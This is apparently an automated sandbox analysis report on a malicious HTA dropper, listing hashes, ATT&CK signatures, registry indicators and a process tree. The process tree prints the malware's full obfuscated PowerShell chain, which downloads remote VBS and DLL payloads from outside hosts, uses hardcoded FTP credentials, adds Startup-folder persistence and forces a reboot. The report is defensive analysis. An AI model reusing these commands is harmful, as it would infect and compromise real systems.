c1ed3fb7bacbb5a6446632d8aa2eb73887c2de3290ad7be306a2b24318e2efdc

Analysis

max time kernel
136s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-10-2024 02:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c1ed3fb7bacbb5a6446632d8aa2eb73887c2de3290ad7be306a2b24318e2efdc.hta
Size

130KB
MD5

2832f20ca7211fcea0b701b836f25da0
SHA1

87f547839e8aa850bacbb14605884630254b2495
SHA256

c1ed3fb7bacbb5a6446632d8aa2eb73887c2de3290ad7be306a2b24318e2efdc
SHA512

7aa21860d2de54ae4de8e4561cfed4ce1c99b42fc623245c06a8d3828cdadf718f24ec765f27b1925c7bb2bae96fb4da4b9529dd0a2c14d63239dd62b966d10b
SSDEEP

96:Eam73RAu/cdJEAbAu/czJEAabU7f/8h0fAu/chAu/c+nxJEAyTAu/cb7T:Ea23PcbFcVXndcfcMytcnT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
19	1364	PoWersHEll.EXE
24	5016	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1364	PoWersHEll.EXE
3408	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2976	powershell.exe
5016	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWersHEll.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	PoWersHEll.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1364	PoWersHEll.EXE
1364	PoWersHEll.EXE
3408	powershell.exe
3408	powershell.exe
2976	powershell.exe
2976	powershell.exe
5016	powershell.exe
5016	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1364	PoWersHEll.EXE
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4604 wrote to memory of 1364	4604	mshta.exe	85
PID 4604 wrote to memory of 1364	4604	mshta.exe	85
PID 4604 wrote to memory of 1364	4604	mshta.exe	85
PID 1364 wrote to memory of 3408	1364	PoWersHEll.EXE	90
PID 1364 wrote to memory of 3408	1364	PoWersHEll.EXE	90
PID 1364 wrote to memory of 3408	1364	PoWersHEll.EXE	90
PID 1364 wrote to memory of 4964	1364	PoWersHEll.EXE	95
PID 1364 wrote to memory of 4964	1364	PoWersHEll.EXE	95
PID 1364 wrote to memory of 4964	1364	PoWersHEll.EXE	95
PID 4964 wrote to memory of 4656	4964	csc.exe	96
PID 4964 wrote to memory of 4656	4964	csc.exe	96
PID 4964 wrote to memory of 4656	4964	csc.exe	96
PID 1364 wrote to memory of 2036	1364	PoWersHEll.EXE	98
PID 1364 wrote to memory of 2036	1364	PoWersHEll.EXE	98
PID 1364 wrote to memory of 2036	1364	PoWersHEll.EXE	98
PID 2036 wrote to memory of 2976	2036	WScript.exe	99
PID 2036 wrote to memory of 2976	2036	WScript.exe	99
PID 2036 wrote to memory of 2976	2036	WScript.exe	99
PID 2976 wrote to memory of 5016	2976	powershell.exe	101
PID 2976 wrote to memory of 5016	2976	powershell.exe	101
PID 2976 wrote to memory of 5016	2976	powershell.exe	101

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c1ed3fb7bacbb5a6446632d8aa2eb73887c2de3290ad7be306a2b24318e2efdc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4604
- C:\Windows\SysWOW64\WiNdOwSPoWErShEll\V1.0\PoWersHEll.EXE
  "C:\Windows\SYsTem32\WiNdOwSPoWErShEll\V1.0\PoWersHEll.EXE" "powErsHELl.EXE -eX bypaSS -nop -w 1 -c DeVIcecrEDEntIAldePLOyMeNt.Exe ; IEX($(Iex('[sYStem.tExt.EncODing]'+[cHar]0x3A+[ChAR]0X3A+'UtF8.GETSTriNg([sySTEM.conVERt]'+[chAr]0x3a+[CHAR]58+'FROmbaSe64STrInG('+[cHar]0x22+'JGpsUEJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdWbmJXRkRnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0hpZ0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c2ZCSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxWnJTQWdhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbEhNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdKYmlvRGlFSE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvR1VDVlByRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGpsUEJ0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTQuMTcxLjE1Ny83MjAvc3lzdGVtcHJvZy52YnMiLCIkRU52OkFQUERBVEFcc3lzdGVtcHJvZy52YnMiLDAsMCk7U3RhcnQtc0xlRXAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc3lzdGVtcHJvZy52YnMi'+[cHaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypaSS -nop -w 1 -c DeVIcecrEDEntIAldePLOyMeNt.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3408
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1qpmws4e\1qpmws4e.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D49.tmp" "c:\Users\Admin\AppData\Local\Temp\1qpmws4e\CSCA2B7446F280640AB8F89513E35A4878.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4656
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\systemprog.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAG0Adg' + [char]66 + 'jAC4AdQ' + [char]66 + 'uAGkAdA' + [char]66 + 'lAGQAcA' + [char]66 + 'hAHIAdA' + [char]66 + 'zAC4Acg' + [char]66 + 'vAC8AZA' + [char]66 + 'oAGwAaA' + [char]66 + 'vAHMAdA' + [char]66 + 'pAG4AZw' + [char]66 + 'zAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'tAG4AZg' + [char]66 + 'qAGQAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'tAG4AZg' + [char]66 + 'qAGQAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'tAG4AZg' + [char]66 + 'qAGQAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AbQ' + [char]66 + 'uAGYAag' + [char]66 + 'kACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AbQ' + [char]66 + 'uAGYAag' + [char]66 + 'kACQAIAA9ACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ACkAKQApACAANAA2ACwANAA2ACwANgA1ACwANQA1ACwAMwA1ACwAOQA0ACwAOQA4ACwANwA3ACwANgA2ACwANQA4ACwAIAA3ADkALAAgADEAMgAxACwAIAAxADcAIAAsADkAMQAxACAALAAwADcAIAAsADYANgAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + 'tAG4AZg' + [char]66 + 'qAGQAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AbQ' + [char]66 + 'uAGYAag' + [char]66 + 'kACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAbQ' + [char]66 + 'uAGYAag' + [char]66 + 'kACQAOw' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'mAEQAWQ' + [char]66 + 'jAG0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACgAIAA9ACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'mAEQAWQ' + [char]66 + 'jAG0AJAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAIAAsAEIASw' + [char]66 + 'MAFIAVQAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'jAHMAYg' + [char]66 + 'sAGsAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AYw' + [char]66 + 'zAGIAbA' + [char]66 + 'rACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAYw' + [char]66 + 'zAGIAbA' + [char]66 + 'rACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'qAGwAZA' + [char]66 + 'jAGIAJAAoACAAPQAgAGoAbA' + [char]66 + 'kAGMAYgAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAGoAbA' + [char]66 + 'kAGMAYgAkACgAIAA9ACAAag' + [char]66 + 'sAGQAYw' + [char]66 + 'iACQAewAgACkAIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAEQAVw' + [char]66 + 'nAFYAcQAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'qAGwAZA' + [char]66 + 'jAGIAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAewAgACkAIA' + [char]66 + 'WAGYAcg' + [char]66 + 'EAFEAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'WAGYAcg' + [char]66 + 'EAFEAJAAgADsA';$xgdhz = $qKKzc; ;$xgdhz = $qKKzc.replace('уЦϚ' , 'B') ;;$kwqtq = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $xgdhz ) ); $kwqtq = $kwqtq[-1..-$kwqtq.Length] -join '';$kwqtq = $kwqtq.replace('%XRqhI%','C:\Users\Admin\AppData\Roaming\systemprog.vbs');powershell $kwqtq
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$bcdlj = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$bcdlj = ($bcdlj + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$bcdlj = ($bcdlj + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$klbsc = (New-Object Net.WebClient);$klbsc.Encoding = [System.Text.Encoding]::UTF8;$klbsc.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Roaming\systemprog.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$djfnm = (New-Object Net.WebClient);$djfnm.Encoding = [System.Text.Encoding]::UTF8;$djfnm.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $djfnm.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' 